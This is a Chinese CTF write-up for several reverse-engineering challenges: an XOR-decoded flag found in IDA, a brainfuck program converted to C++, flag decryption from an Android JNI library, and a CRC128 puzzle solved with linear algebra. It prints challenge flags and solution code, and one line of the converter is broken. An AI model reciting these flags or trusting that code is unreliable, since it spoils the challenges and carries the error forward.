    .text:0000000000401A48 loc_401A48:                             ; CODE XREF: .text:00000000004017EF↑j
    .text:0000000000401A48                                         ; DATA XREF: .rodata:off_4021D8↓o
    .text:0000000000401A48                 mov     cs:dword_6031F4, 1 ; jumptable 00000000004017EF case 31
    .text:0000000000401A52                 add     dword ptr [rbp-0FCCh], 1
    .text:0000000000401A59                 jmp     short loc_401A5C
    .text:0000000000401A5B ; ---------------------------------------------------------------------------
    .text:0000000000401A5B
    .text:0000000000401A5B loc_401A5B:                             ; CODE XREF: .text:00000000004017DF↑j
    .text:0000000000401A5B                                         ; .text:00000000004017EF↑j
    .text:0000000000401A5B                                         ; DATA XREF: ...
    .text:0000000000401A5B                 nop                     ; jumptable 00000000004017EF default case
    .text:0000000000401A5C
    .text:0000000000401A5C loc_401A5C:                             ; CODE XREF: .text:00000000004017C8↑j
    .text:0000000000401A5C                                         ; .text:0000000000401810↑j ...
    .text:0000000000401A5C                 cmp     dword ptr [rbp-0FB4h], 0
    .text:0000000000401A63                 jz      loc_4017CD
    .text:0000000000401A69                 mov     eax, cs:dword_6031F4
    .text:0000000000401A6F                 test    eax, eax
    .text:0000000000401A71                 jnz     short loc_401A7F
    .text:0000000000401A73                 mov     eax, 0
    .text:0000000000401A78                 call    sub_40083E
    .text:0000000000401A7D ; ---------------------------------------------------------------------------
    .text:0000000000401A7D                 jmp     short loc_401A89
    .text:0000000000401A7F ; ---------------------------------------------------------------------------
    .text:0000000000401A7F
    .text:0000000000401A7F loc_401A7F:                             ; CODE XREF: .text:0000000000401A71↑j
    .text:0000000000401A7F                 mov     eax, 0
    .text:0000000000401A84                 call    sub_400856
    .text:0000000000401A89 ; ---------------------------------------------------------------------------
    .text:0000000000401A89
    .text:0000000000401A89 loc_401A89:                             ; CODE XREF: .text:0000000000401A7D↑j
    .text:0000000000401A89                 nop
    .text:0000000000401A8A                 mov     rax, [rbp-8]
    .text:0000000000401A8E                 xor     rax, fs:28h
    .text:0000000000401A97                 jz      short locret_401A9E
    .text:0000000000401A99                 call    ___stack_chk_fail
    .text:0000000000401A9E ; ---------------------------------------------------------------------------
    .text:0000000000401A9E
    .text:0000000000401A9E locret_401A9E:                          ; CODE XREF: .text:0000000000401A97↑j
    .text:0000000000401A9E                 leave
    .text:0000000000401A9F                 retn
    .text:0000000000401A9F ; } // starts at 401747
    View Code

    这里可以用IDA动态调试跟下关键语句处的寄存器,发现是用之前第一层的密码来循环异或存储在dword_6030E0的一段数据,所以写个脚本解码就可以获得Flag

    //cnss{Be_c4refu1_ab0u7_yoUr_ha1r}

     

    brainf**ker‘s challenge

    没找到好用的Wheel,于是就自己写了个bfcpp的程序

    #include <cstdio>
    #include <cstring>
    char str[100000];
    int inc,dec,tab,line;
    void sl(int cnt){
        for (int j=0;j<cnt;j++) printf("    ");
    }
    void el(){
        printf("\n",line);
    }
    int main(){
        freopen("code.bf","r",stdin);
        freopen("code.cpp","w",stdout);
        
        inc=0,dec=0,tab=0,line=0;
        sl(tab);printf("#include <cstdio>\n");
        sl(tab);printf("int mem[1000000], pt=0; void out(int a) { printf(\"%%c\", a); }int in() { return getchar(); }return ch; }\n");
        sl(tab);printf("int main(){");el();
        tab++;
        while(scanf("%s",str)!=EOF)
        {
            int len=strlen(str);
            for (int i=0;i<len;i++)
            {
                //printf("%c\n",str[i]);
                switch(str[i])
                {
                    case '>':
                        inc++;
                        if (str[i]!=str[i+1]){sl(tab);printf("pt+=%d;",inc);el();inc=0;}
                        break;
                    case '<':    
                        dec++;
                        if (str[i]!=str[i+1]){sl(tab);printf("pt-=%d;",dec);el();dec=0;}
                        break;
                    case '+':
                        inc++;
                        if (str[i]!=str[i+1]){sl(tab);printf("mem[pt]+=%d;",inc);el();inc=0;}
                        break;
                    case '-':
                        dec++;
                        if (str[i]!=str[i+1]){sl(tab);printf("mem[pt]-=%d;",dec);el();dec=0;}
                        break;
                    case '.':
                        sl(tab);printf("out(mem[pt]);");el();
                        break;
                    case ',':
                        sl(tab);printf("mem[pt]=in();");el();
                        break;
                    case '[':
                        tab++;
                        sl(tab-1);printf("while(mem[pt]){");el();
                        break;
                    case ']':
                        tab--;
                        sl(tab);printf("}");el();
                        break;
                    case '#':
                        sl(tab);printf("return 0;");el();
                        break;
                    case '\n':
                        break;
                }
            }
        }
        sl(tab-1);printf("}");//el();
    } 
    
    /*(
    >
    指针加一
    <
    指针减一
    +
    指针指向的字节的值加一
    -
    指针指向的字节的值减一
    .
    输出指针指向的单元内容(ASCII码)
    ,
    输入内容到指针指向的单元(ASCII码)
    [
    如果指针指向的单元值为零,向后跳转到对应的]指令的次一指令处
    ]
    如果指针指向的单元值不为零,向前跳转到对应的[指令的次一指令处
    #
    强制退出程序( 为了简化程序而额外增加的一个状态 )
    */

    将如下bf程序存储到code.bf,执行转换程序

    <[<]>[.>]
    >++++++++++[<++++++++++>-]<+++++++[<->-]<[#]>++++++++++[<++++++++++>-]<-[<->-]<[#]>++++++++++[<++++++++++>-]<++[<->-]<[#]>+++++++++++[<++++++++++>-]<[<->-]<[#]
    >+++[<++++++++++>-]<+++[<->-]<[#]>++++++++++[<++++++++++>-]<---[<->-]<[#]>+++++++++++[<++++++++++>-]<++++[<->-]<[#]>++++++++++[<++++++++++>-]<--[<->-]<[#]
    <[>>+<<-]>>[<+<+>>-]>++++++[<++++++++++>-]<---[<->-]<[#]
    >++++++[<++++++++>-]<[<-<->>-]<<[>++++++++++<-]>>>++++[<++++++++++>-]<-[<->-]<[#]

    生成的code.cpp伪代码如下

    #include <cstdio>
    int mem[1000000], pt=0; void out(int a) { printf("%c", a); }int in() { return getchar(); }return ch; }
    int main(){
        pt-=1;
        while(mem[pt]){
            pt-=1;
        }
        pt+=1;
        while(mem[pt]){
            out(mem[pt]);
            pt+=1;
        }
        pt+=1;
        mem[pt]+=10;
        while(mem[pt]){
            pt-=1;
            mem[pt]+=10;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        mem[pt]+=7;
        while(mem[pt]){
            pt-=1;
            mem[pt]-=1;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        while(mem[pt]){
            return 0;
        }
        pt+=1;
        mem[pt]+=10;
        while(mem[pt]){
            pt-=1;
            mem[pt]+=10;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        mem[pt]-=1;
        while(mem[pt]){
            pt-=1;
            mem[pt]-=1;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        while(mem[pt]){
            return 0;
        }
        pt+=1;
        mem[pt]+=10;
        while(mem[pt]){
            pt-=1;
            mem[pt]+=10;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        mem[pt]+=2;
        while(mem[pt]){
            pt-=1;
            mem[pt]-=1;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        while(mem[pt]){
            return 0;
        }
        pt+=1;
        mem[pt]+=11;
        while(mem[pt]){
            pt-=1;
            mem[pt]+=10;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        while(mem[pt]){
            pt-=1;
            mem[pt]-=1;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        while(mem[pt]){
            return 0;
        }
        pt+=1;
        mem[pt]+=3;
        while(mem[pt]){
            pt-=1;
            mem[pt]+=10;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        mem[pt]+=3;
        while(mem[pt]){
            pt-=1;
            mem[pt]-=1;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        while(mem[pt]){
            return 0;
        }
        pt+=1;
        mem[pt]+=10;
        while(mem[pt]){
            pt-=1;
            mem[pt]+=10;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        mem[pt]-=3;
        while(mem[pt]){
            pt-=1;
            mem[pt]-=1;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        while(mem[pt]){
            return 0;
        }
        pt+=1;
        mem[pt]+=11;
        while(mem[pt]){
            pt-=1;
            mem[pt]+=10;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        mem[pt]+=4;
        while(mem[pt]){
            pt-=1;
            mem[pt]-=1;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        while(mem[pt]){
            return 0;
        }
        pt+=1;
        mem[pt]+=10;
        while(mem[pt]){
            pt-=1;
            mem[pt]+=10;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        mem[pt]-=2;
        while(mem[pt]){
            pt-=1;
            mem[pt]-=1;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        while(mem[pt]){
            return 0;
        }
        pt-=1;
        while(mem[pt]){
            pt+=2;
            mem[pt]+=1;
            pt-=2;
            mem[pt]-=1;
        }
        pt+=2;
        while(mem[pt]){
            pt-=1;
            mem[pt]+=1;
            pt-=1;
            mem[pt]+=1;
            pt+=2;
            mem[pt]-=1;
        }
        pt+=1;
        mem[pt]+=6;
        while(mem[pt]){
            pt-=1;
            mem[pt]+=10;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        mem[pt]-=3;
        while(mem[pt]){
            pt-=1;
            mem[pt]-=1;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        while(mem[pt]){
            return 0;
        }
        pt+=1;
        mem[pt]+=6;
        while(mem[pt]){
            pt-=1;
            mem[pt]+=8;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        while(mem[pt]){
            pt-=1;
            mem[pt]-=1;
            pt-=1;
            mem[pt]-=1;
            pt+=2;
            mem[pt]-=1;
        }
        pt-=2;
        while(mem[pt]){
            pt+=1;
            mem[pt]+=10;
            pt-=1;
            mem[pt]-=1;
        }
        pt+=3;
        mem[pt]+=4;
        while(mem[pt]){
            pt-=1;
            mem[pt]+=10;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        mem[pt]-=1;
        while(mem[pt]){
            pt-=1;
            mem[pt]-=1;
            pt+=1;
            mem[pt]-=1;
        }
        pt-=1;
        while(mem[pt]){
            return 0;
        }
    }
    View Code

    然后代码逻辑很直观,手玩就知道Flag

    //cnss{39bra!nfck}

     

    Language_Problem

    用Jadx查看Java源代码

    this.textView.setText(MyJni.getFlag());
    
    public class MyJni {
        public static native String getFlag();
        static {
            System.loadLibrary("MyJni");
        }
    }

    发现输出Flag的时候调用了类MyJni中的函数getFlag,而且这个类MyJni是从动态库libMyJni.so加载的,这里可以用Apktool来解包提取动态库

    apktool.bat xi4sht.apk

    把提取出来的动态库libMyJni.so放到IDA里生成下面的伪代码,再把伪代码改一改编译一下就能跑出Flag了

    int Decode_Flag()
    {
      char *v0; // edi
      size_t v1; // edx
      _BYTE *v2; // esi
      unsigned int v3; // eax
      signed int v4; // ecx
      char *v5; // edi
      _WORD *v6; // esi
      char *v7; // edi
      int v8; // ecx
      int v9; // ebp
      unsigned __int8 v10; // ST10_1
      int result; // eax
      __int16 v12; // cx
      char v13; // [esp+29h] [ebp-133h]
      char v14; // [esp+2Ah] [ebp-132h]
      int v15; // [esp+2Ch] [ebp-130h]
      int v16; // [esp+13Ch] [ebp-20h]
    
      v0 = &v14;
      v1 = strlen(flag);
      v2 = &key[1];
      v13 = key[0];
      v3 = 254;
      if ( (unsigned int)&v14 & 2 )
      {
        v12 = *(_WORD *)v2;
        v0 = (char *)&v15;
        v3 = 252;
        v2 = &key[3];
        *(_WORD *)&v14 = v12;
      }
      qmemcpy(v0, v2, 4 * (v3 >> 2));
      v6 = &v2[4 * (v3 >> 2)];
      v5 = &v0[4 * (v3 >> 2)];
      v4 = 0;
      if ( v3 & 2 )
      {
        *(_WORD *)v5 = *v6;
        v4 = 1;
      }
      if ( v3 & 1 )
        v5[v4 * 2] = v6[v4];
      if ( v1 )
      {
        v7 = flag;
        v8 = 0;
        v9 = 0;
        do
        {
          ++v7;
          v9 += -255 * ((v9 + 1) / 255) + 1;
          v10 = *(&v13 + v9);
          v8 = (v10 + v8) % 255;
          *(&v13 + v9) = *(&v13 + v8);
          *(&v13 + v8) = v10;
          *(v7 - 1) ^= *(&v13 + (v10 + (unsigned int)(unsigned __int8)*(&v13 + v9)) % 0xFF);
        }
        while ( v7 != &flag[v1] );
      }
      result = _stack_chk_guard;
      if ( v16 != _stack_chk_guard )
        sub_430();
      return result;
    }
    int __cdecl Java_com_example_languageproblem_MyJni_getFlag(int a1)
    {
      Decode_Flag();
      return (*(int (__cdecl **)(int, char *))(*(_DWORD *)a1 + 668))(a1, flag);
    }
    //cnss{Y0u_Ar3_an_Apk_cr4ck3r}

     

    [Boss] Algebra Game

    先脱Upx壳,再F5查看伪代码

    发现有垃圾代码导致不能生成伪代码,可以用字节替换过掉,再把花指令修复下就可以看出逻辑了

    再次F5查看伪代码,发现程序的核心是个不认识的多轮加密,询问yype后得知这是CRC128

    这时问题就转化为了求Content满足下式

    CRC128(cnss{Content})==Content

    而CRC128有个特性,就是它的加密是线性的

    原文的某一位Flip会影响到最终Hash的特定若干位的Flip

    这个影响在原文长度固定的时候是固定的

    所以只要统计出每一位Flip对最后结果的影响,再用高斯消元解异或方程组即可解得Flag

    unsigned char key[256 * 16] = { 0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0
    ,0x97,0x1,0x0A1,0x0ED,0x0C6,0x0E6,0x0B2,0x0F,0x86,0x66,0x5B,0x0AC,0x76,0x0A6,0x17,0x0E2
    ,0x0DD,0x0AA,0x0B9,0x22,0x13,0x46,0x0CF,0x0D2,0x4E,0x0D1,0x57,0x42,0x0D4,0x0D3,0x4,0x0AF
    ,0x4A,0x0AB,0x18,0x0CF,0x0D5,0x0A0,0x7D,0x0DD,0x0C8,0x0B7,0x0C,0x0EE,0x0A2,0x75,0x13,0x4D
    ,0x49,0x0FC,0x88,0x0BC,0x0B8,0x7,0x34,0x68,0x0DF,0x0BE,0x4E,0x9E,0x91,0x38,0x22,0x35
    ,0x0DE,0x0FD,0x29,0x51,0x7E,0x0E1,0x86,0x67,0x59,0x0D8,0x15,0x32,0x0E7,0x9E,0x35,0x0D7
    ,0x94,0x56,0x31,0x9E,0x0AB,0x41,0x0FB,0x0BA,0x91,0x6F,0x19,0x0DC,0x45,0x0EB,0x26,0x9A
    ,0x3,0x57,0x90,0x73,0x6D,0x0A7,0x49,0x0B5,0x17,0x9,0x42,0x70,0x33,0x4D,0x31,0x78
    ,0x92,0x0F8,0x11,0x79,0x71,0x0F,0x68,0x0D0,0x0BE,0x7D,0x9D,0x3C,0x23,0x71,0x44,0x6A
    ,0x5,0x0F9,0x0B0,0x94,0x0B7,0x0E9,0x0DA,0x0DF,0x38,0x1B,0x0C6,0x90,0x55,0x0D7,0x53,0x88
    ,0x4F,0x52,0x0A8,0x5B,0x62,0x49,0x0A7,0x2,0x0F0,0x0AC,0x0CA,0x7E,0x0F7,0x0A2,0x40,0x0C5
    ,0x0D8,0x53,0x9,0x0B6,0x0A4,0x0AF,0x15,0x0D,0x76,0x0CA,0x91,0x0D2,0x81,0x4,0x57,0x27
    ,0x0DB,0x4,0x99,0x0C5,0x0C9,0x8,0x5C,0x0B8,0x61,0x0C3,0x0D3,0x0A2,0x0B2,0x49,0x66,0x5F
    ,0x4C,0x5,0x38,0x28,0x0F,0x0EE,0x0EE,0x0B7,0x0E7,0x0A5,0x88,0x0E,0x0C4,0x0EF,0x71,0x0BD
    ,0x6,0x0AE,0x20,0x0E7,0x0DA,0x4E,0x93,0x6A,0x2F,0x12,0x84,0x0E0,0x66,0x9A,0x62,0x0F0
    ,0x91,0x0AF,0x81,0x0A,0x1C,0x0A8,0x21,0x65,0x0A9,0x74,0x0DF,0x4C,0x10,0x3C,0x75,0x12
    ,0x24,0x0F1,0x23,0x0F2,0x0E2,0x1E,0x0D0,0x0A0,0x7D,0x0FB,0x3A,0x79,0x46,0x0E2,0x88,0x0D4
    ,0x0B3,0x0F0,0x82,0x1F,0x24,0x0F8,0x62,0x0AF,0x0FB,0x9D,0x61,0x0D5,0x30,0x44,0x9F,0x36
    ,0x0F9,0x5B,0x9A,0x0D0,0x0F1,0x58,0x1F,0x72,0x33,0x2A,0x6D,0x3B,0x92,0x31,0x8C,0x7B
    ,0x6E,0x5A,0x3B,0x3D,0x37,0x0BE,0x0AD,0x7D,0x0B5,0x4C,0x36,0x97,0x0E4,0x97,0x9B,0x99
    ,0x6D,0x0D,0x0AB,0x4E,0x5A,0x19,0x0E4,0x0C8,0x0A2,0x45,0x74,0x0E7,0x0D7,0x0DA,0x0AA,0x0E1
    ,0x0FA,0x0C,0x0A,0x0A3,0x9C,0x0FF,0x56,0x0C7,0x24,0x23,0x2F,0x4B,0x0A1,0x7C,0x0BD,0x3
    ,0x0B0,0x0A7,0x12,0x6C,0x49,0x5F,0x2B,0x1A,0x0EC,0x94,0x23,0x0A5,0x3,0x9,0x0AE,0x4E
    ,0x27,0x0A6,0x0B3,0x81,0x8F,0x0B9,0x99,0x15,0x6A,0x0F2,0x78,0x9,0x75,0x0AF,0x0B9,0x0AC
    ,0x0B6,0x9,0x32,0x8B,0x93,0x11,0x0B8,0x70,0x0C3,0x86,0x0A7,0x45,0x65,0x93,0x0CC,0x0BE
    ,0x21,0x8,0x93,0x66,0x55,0x0F7,0x0A,0x7F,0x45,0x0E0,0x0FC,0x0E9,0x13,0x35,0x0DB,0x5C
    ,0x6B,0x0A3,0x8B,0x0A9,0x80,0x57,0x77,0x0A2,0x8D,0x57,0x0F0,0x7,0x0B1,0x40,0x0C8,0x11
    ,0x0FC,0x0A2,0x2A,0x44,0x46,0x0B1,0x0C5,0x0AD,0x0B,0x31,0x0AB,0x0AB,0x0C7,0x0E6,0x0DF,0x0F3
    ,0x0FF,0x0F5,0x0BA,0x37,0x2B,0x16,0x8C,0x18,0x1C,0x38,0x0E9,0x0DB,0x0F4,0x0AB,0x0EE,0x8B
    ,0x68,0x0F4,0x1B,0x0DA,0x0ED,0x0F0,0x3E,0x17,0x9A,0x5E,0x0B2,0x77,0x82,0x0D,0x0F9,0x69
    ,0x22,0x5F,0x3,0x15,0x38,0x50,0x43,0x0CA,0x52,0x0E9,0x0BE,0x99,0x20,0x78,0x0EA,0x24
    ,0x0B5,0x5E,0x0A2,0x0F8,0x0FE,0x0B6,0x0F1,0x0C5,0x0D4,0x8F,0x0E5,0x35,0x56,0x0DE,0x0FD,0x0C6
    ,0x0BB,0x4B,0x0BC,0x1D,0x5B,0x0B6,0x0A,0x8C,0x0B9,0x0EA,0x94,0x0E8,0x0B5,0x5B,0x3A,0x0C2
    ,0x2C,0x4A,0x1D,0x0F0,0x9D,0x50,0x0B8,0x83,0x3F,0x8C,0x0CF,0x44,0x0C3,0x0FD,0x2D,0x20
    ,0x66,0x0E1,0x5,0x3F,0x48,0x0F0,0x0C5,0x5E,0x0F7,0x3B,0x0C3,0x0AA,0x61,0x88,0x3E,0x6D
    ,0x0F1,0x0E0,0x0A4,0x0D2,0x8E,0x16,0x77,0x51,0x71,0x5D,0x98,0x6,0x17,0x2E,0x29,0x8F
    ,0x0F2,0x0B7,0x34,0x0A1,0x0E3,0x0B1,0x3E,0x0E4,0x66,0x54,0x0DA,0x76,0x24,0x63,0x18,0x0F7
    ,0x65,0x0B6,0x95,0x4C,0x25,0x57,0x8C,0x0EB,0x0E0,0x32,0x81,0x0DA,0x52,0x0C5,0x0F,0x15
    ,0x2F,0x1D,0x8D,0x83,0x0F0,0x0F7,0x0F1,0x36,0x28,0x85,0x8D,0x34,0x0F0,0x0B0,0x1C,0x58
    ,0x0B8,0x1C,0x2C,0x6E,0x36,0x11,0x43,0x39,0x0AE,0x0E3,0x0D6,0x98,0x86,0x16,0x0B,0x0BA
    ,0x29,0x0B3,0x0AD,0x64,0x2A,0x0B9,0x62,0x5C,0x7,0x97,0x9,0x0D4,0x96,0x2A,0x7E,0x0A8
    ,0x0BE,0x0B2,0x0C,0x89,0x0EC,0x5F,0x0D0,0x53,0x81,0x0F1,0x52,0x78,0x0E0,0x8C,0x69,0x4A
    ,0x0F4,0x19,0x14,0x46,0x39,0x0FF,0x0AD,0x8E,0x49,0x46,0x5E,0x96,0x42,0x0F9,0x7A,0x7
    ,0x63,0x18,0x0B5,0x0AB,0x0FF,0x19,0x1F,0x81,0x0CF,0x20,0x5,0x3A,0x34,0x5F,0x6D,0x0E5
    ,0x60,0x4F,0x25,0x0D8,0x92,0x0BE,0x56,0x34,0x0D8,0x29,0x47,0x4A,0x7,0x12,0x5C,0x9D
    ,0x0F7,0x4E,0x84,0x35,0x54,0x58,0x0E4,0x3B,0x5E,0x4F,0x1C,0x0E6,0x71,0x0B4,0x4B,0x7F
    ,0x0BD,0x0E5,0x9C,0x0FA,0x81,0x0F8,0x99,0x0E6,0x96,0x0F8,0x10,0x8,0x0D3,0x0C1,0x58,0x32
    ,0x2A,0x0E4,0x3D,0x17,0x47,0x1E,0x2B,0x0E9,0x10,0x9E,0x4B,0x0A4,0x0A5,0x67,0x4F,0x0D0
    ,0x9F,0x0BA,0x9F,0x0EF,0x0B9,0x0A8,0x0DA,0x2C,0x0C4,0x11,0x0AE,0x91,0x0F3,0x0B9,0x0B2,0x16
    ,0x8,0x0BB,0x3E,0x2,0x7F,0x4E,0x68,0x23,0x42,0x77,0x0F5,0x3D,0x85,0x1F,0x0A5,0x0F4
    ,0x42,0x10,0x26,0x0CD,0x0AA,0x0EE,0x15,0x0FE,0x8A,0x0C0,0x0F9,0x0D3,0x27,0x6A,0x0B6,0x0B9
    ,0x0D5,0x11,0x87,0x20,0x6C,0x8,0x0A7,0x0F1,0x0C,0x0A6,0x0A2,0x7F,0x51,0x0CC,0x0A1,0x5B
    ,0x0D6,0x46,0x17,0x53,0x1,0x0AF,0x0EE,0x44,0x1B,0x0AF,0x0E0,0x0F,0x62,0x81,0x90,0x23
    ,0x41,0x47,0x0B6,0x0BE,0x0C7,0x49,0x5C,0x4B,0x9D,0x0C9,0x0BB,0x0A3,0x14,0x27,0x87,0x0C1
    ,0x0B,0x0EC,0x0AE,0x71,0x12,0x0E9,0x21,0x96,0x55,0x7E,0x0B7,0x4D,0x0B6,0x52,0x94,0x8C
    ,0x9C,0x0ED,0x0F,0x9C,0x0D4,0x0F,0x93,0x99,0x0D3,0x18,0x0EC,0x0E1,0x0C0,0x0F4,0x83,0x6E
    ,0x0D,0x42,0x8E,0x96,0x0C8,0x0A7,0x0B2,0x0FC,0x7A,0x6C,0x33,0x0AD,0x0D0,0x0C8,0x0F6,0x7C
    ,0x9A,0x43,0x2F,0x7B,0x0E,0x41,0x0,0x0F3,0x0FC,0x0A,0x68,0x1,0x0A6,0x6E,0x0E1,0x9E
    ,0x0D0,0x0E8,0x37,0x0B4,0x0DB,0x0E1,0x7D,0x2E,0x34,0x0BD,0x64,0x0EF,0x4,0x1B,0x0F2,0x0D3
    ,0x47,0x0E9,0x96,0x59,0x1D,0x7,0x0CF,0x21,0x0B2,0x0DB,0x3F,0x43,0x72,0x0BD,0x0E5,0x31
    ,0x44,0x0BE,0x6,0x2A,0x70,0x0A0,0x86,0x94,0x0A5,0x0D2,0x7D,0x33,0x41,0x0F0,0x0D4,0x49
    ,0x0D3,0x0BF,0x0A7,0x0C7,0x0B6,0x46,0x34,0x9B,0x23,0x0B4,0x26,0x9F,0x37,0x56,0x0C3,0x0AB
    ,0x99,0x14,0x0BF,0x8,0x63,0x0E6,0x49,0x46,0x0EB,0x3,0x2A,0x71,0x95,0x23,0x0D0,0x0E6
    ,0x0E,0x15,0x1E,0x0E5,0x0A5,0x0,0x0FB,0x49,0x6D,0x65,0x71,0x0DD,0x0E3,0x85,0x0C7,0x4
    ,0x85,0x3E,0x83,0x0C2,0x28,0x0E7,0x0BF,0x0D5,0x31,0x0C9,0x0C8,0x0CB,0x52,0x28,0x5F,0x0EF
    ,0x12,0x3F,0x22,0x2F,0x0EE,0x1,0x0D,0x0DA,0x0B7,0x0AF,0x93,0x67,0x24,0x8E,0x48,0x0D
    ,0x58,0x94,0x3A,0x0E0,0x3B,0x0A1,0x70,0x7,0x7F,0x18,0x9F,0x89,0x86,0x0FB,0x5B,0x40
    ,0x0CF,0x95,0x9B,0x0D,0x0FD,0x47,0x0C2,0x8,0x0F9,0x7E,0x0C4,0x25,0x0F0,0x5D,0x4C,0x0A2
    ,0x0CC,0x0C2,0x0B,0x7E,0x90,0x0E0,0x8B,0x0BD,0x0EE,0x77,0x86,0x55,0x0C3,0x10,0x7D,0x0DA
    ,0x5B,0x0C3,0x0AA,0x93,0x56,0x6,0x39,0x0B2,0x68,0x11,0x0DD,0x0F9,0x0B5,0x0B6,0x6A,0x38
    ,0x11,0x68,0x0B2,0x5C,0x83,0x0A6,0x44,0x6F,0x0A0,0x0A6,0x0D1,0x17,0x17,0x0C3,0x79,0x75
    ,0x86,0x69,0x13,0x0B1,0x45,0x40,0x0F6,0x60,0x26,0x0C0,0x8A,0x0BB,0x61,0x65,0x6E,0x97
    ,0x17,0x0C6,0x92,0x0BB,0x59,0x0E8,0x0D7,0x5,0x8F,0x0B4,0x55,0x0F7,0x71,0x59,0x1B,0x85
    ,0x80,0x0C7,0x33,0x56,0x9F,0x0E,0x65,0x0A,0x9,0x0D2,0x0E,0x5B,0x7,0x0FF,0x0C,0x67
    ,0x0CA,0x6C,0x2B,0x99,0x4A,0x0AE,0x18,0x0D7,0x0C1,0x65,0x2,0x0B5,0x0A5,0x8A,0x1F,0x2A
    ,0x5D,0x6D,0x8A,0x74,0x8C,0x48,0x0AA,0x0D8,0x47,0x3,0x59,0x19,0x0D3,0x2C,0x8,0x0C8
    ,0x5E,0x3A,0x1A,0x7,0x0E1,0x0EF,0x0E3,0x6D,0x50,0x0A,0x1B,0x69,0x0E0,0x61,0x39,0x0B0
    ,0x0C9,0x3B,0x0BB,0x0EA,0x27,0x9,0x51,0x62,0x0D6,0x6C,0x40,0x0C5,0x96,0x0C7,0x2E,0x52
    ,0x83,0x90,0x0A3,0x25,0x0F2,0x0A9,0x2C,0x0BF,0x1E,0x0DB,0x4C,0x2B,0x34,0x0B2,0x3D,0x1F
    ,0x14,0x91,0x2,0x0C8,0x34,0x4F,0x9E,0x0B0,0x98,0x0BD,0x17,0x87,0x42,0x14,0x2A,0x0FD
    ,0x0A1,0x0CF,0x0A0,0x30,0x0CA,0x0F9,0x6F,0x75,0x4C,0x32,0x0F2,0x0B2,0x14,0x0CA,0x0D7,0x3B
    ,0x36,0x0CE,0x1,0x0DD,0x0C,0x1F,0x0DD,0x7A,0x0CA,0x54,0x0A9,0x1E,0x62,0x6C,0x0C0,0x0D9
    ,0x7C,0x65,0x19,0x12,0x0D9,0x0BF,0x0A0,0x0A7,0x2,0x0E3,0x0A5,0x0F0,0x0C0,0x19,0x0D3,0x94
    ,0x0EB,0x64,0x0B8,0x0FF,0x1F,0x59,0x12,0x0A8,0x84,0x85,0x0FE,0x5C,0x0B6,0x0BF,0x0C4,0x76
    ,0x0E8,0x33,0x28,0x8C,0x72,0x0FE,0x5B,0x1D,0x93,0x8C,0x0BC,0x2C,0x85,0x0F2,0x0F5,0x0E
    ,0x7F,0x32,0x89,0x61,0x0B4,0x18,0x0E9,0x12,0x15,0x0EA,0x0E7,0x80,0x0F3,0x54,0x0E2,0x0EC
    ,0x35,0x99,0x91,0x0AE,0x61,0x0B8,0x94,0x0CF,0x0DD,0x5D,0x0EB,0x6E,0x51,0x21,0x0F1,0x0A1
    ,0x0A2,0x98,0x30,0x43,0x0A7,0x5E,0x26,0x0C0,0x5B,0x3B,0x0B0,0x0C2,0x27,0x87,0x0E6,0x43
    ,0x33,0x37,0x0B1,0x49,0x0BB,0x0F6,0x7,0x0A5,0x0F2,0x4F,0x6F,0x8E,0x37,0x0BB,0x93,0x51
    ,0x0A4,0x36,0x10,0x0A4,0x7D,0x10,0x0B5,0x0AA,0x74,0x29,0x34,0x22,0x41,0x1D,0x84,0x0B3
    ,0x0EE,0x9D,0x8,0x6B,0x0A8,0x0B0,0x0C8,0x77,0x0BC,0x9E,0x38,0x0CC,0x0E3,0x68,0x97,0x0FE
    ,0x79,0x9C,0x0A9,0x86,0x6E,0x56,0x7A,0x78,0x3A,0x0F8,0x63,0x60,0x95,0x0CE,0x80,0x1C
    ,0x7A,0x0CB,0x39,0x0F5,0x3,0x0F1,0x33,0x0CD,0x2D,0x0F1,0x21,0x10,0x0A6,0x83,0x0B1,0x64
    ,0x0ED,0x0CA,0x98,0x18,0x0C5,0x17,0x81,0x0C2,0x0AB,0x97,0x7A,0x0BC,0x0D0,0x25,0x0A6,0x86
    ,0x0A7,0x61,0x80,0x0D7,0x10,0x0B7,0x0FC,0x1F,0x63,0x20,0x76,0x52,0x72,0x50,0x0B5,0x0CB
    ,0x30,0x60,0x21,0x3A,0x0D6,0x51,0x4E,0x10,0x0E5,0x46,0x2D,0x0FE,0x4,0x0F6,0x0A2,0x29
    ,0x3E,0x75,0x3F,0x0DF,0x73,0x51,0x0B5,0x59,0x88,0x23,0x5C,0x23,0x0E7,0x73,0x65,0x2D
    ,0x0A9,0x74,0x9E,0x32,0x0B5,0x0B7,0x7,0x56,0x0E,0x45,0x7,0x8F,0x91,0x0D5,0x72,0x0CF
    ,0x0E3,0x0DF,0x86,0x0FD,0x60,0x17,0x7A,0x8B,0x0C6,0x0F2,0x0B,0x61,0x33,0x0A0,0x61,0x82
    ,0x74,0x0DE,0x27,0x10,0x0A6,0x0F1,0x0C8,0x84,0x40,0x94,0x50,0x0CD,0x45,0x6,0x76,0x60
    ,0x77,0x89,0x0B7,0x63,0x0CB,0x56,0x81,0x31,0x57,0x9D,0x12,0x0BD,0x76,0x4B,0x47,0x18
    ,0x0E0,0x88,0x16,0x8E,0x0D,0x0B0,0x33,0x3E,0x0D1,0x0FB,0x49,0x11,0x0,0x0ED,0x50,0x0FA
